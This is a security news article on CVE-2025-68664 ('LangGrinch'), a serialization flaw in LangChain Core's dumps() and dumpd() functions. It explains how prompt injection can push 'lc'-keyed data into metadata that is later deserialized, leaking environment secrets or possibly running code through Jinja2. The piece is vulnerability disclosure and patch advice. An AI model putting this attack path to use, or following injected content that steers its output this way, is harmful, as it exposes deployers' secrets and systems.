LangChain core vulnerability allows prompt injection and data exposure

LangChain core vulnerability allows prompt injection and data exposure

LangChain core vulnerability allows prompt injection and data exposure

Pierluigi Paganini
LangChain core vulnerability allows prompt injection and data exposure December 27, 2025

LangChain core vulnerability allows prompt injection and data exposure

A critical flaw in LangChain Core could allow attackers to steal sensitive secrets and manipulate LLM responses via prompt injection.

LangChain Core (langchain-core) is a key Python package in the LangChain ecosystem that provides core interfaces and model-agnostic tools for building LLM-based applications. A critical vulnerability, tracked as CVE-2025-68664 (CVSS score of 9.3), affects the package. Security researcher Yarden Porat reported the issue on December 4, 2025, and named it LangGrinch.

“A serialization injection vulnerability exists in LangChain’s dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.” reads the advisory.

The vulnerability stemmed from the functions dumps() and dumpd(), which do not escape user-controlled dictionaries containing “lc” keys. When deserialized with load() or loads(), this data was treated as valid LangChain objects instead of user input. This allowed attackers to inject malicious object structures through fields like metadata or response data. The flaw also enabled instantiation of Serializable classes within trusted LangChain namespaces, including those with side effects in initialization, though it could not load arbitrary external classes.

Cyata researcher Yarden Porat said the issue stems from two functions that failed to escape user-controlled dictionaries containing “lc” keys, which mark LangChain objects in its serialization format. If attackers force a LangChain loop to serialize and later deserialize such data, unsafe objects may be instantiated.

“So once an attacker is able to make a LangChain orchestration loop serialize and later deserialize content including an ‘lc’ key, they would instantiate an unsafe arbitrary object, potentially triggering many attacker-friendly paths.” wrote Porat.

This can lead to secret leakage from environment variables, instantiation of classes in trusted namespaces like langchain_core or langchain_community, and potentially code execution via Jinja2 templates. The bug also allows object injection through user-controlled fields such as metadata or response data using prompt injection.

Porat pointed out that this vulnerability is especially serious because it affects langchain-core itself, not a peripheral tool or edge case. The vulnerable dumps() and dumpd() APIs sit at the framework’s core, which is widely deployed at massive scale, with hundreds of millions of installs globally. A single prompt can trigger the flaw indirectly, as LLM outputs may influence metadata that later gets serialized and deserialized during normal operations. This makes exploitation subtle and far-reaching. Patches are available in versions 1.2.5 and 0.3.81, and users should update immediately.

Users are urged to address the flaw as soon as possible.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, LangChain)







Source link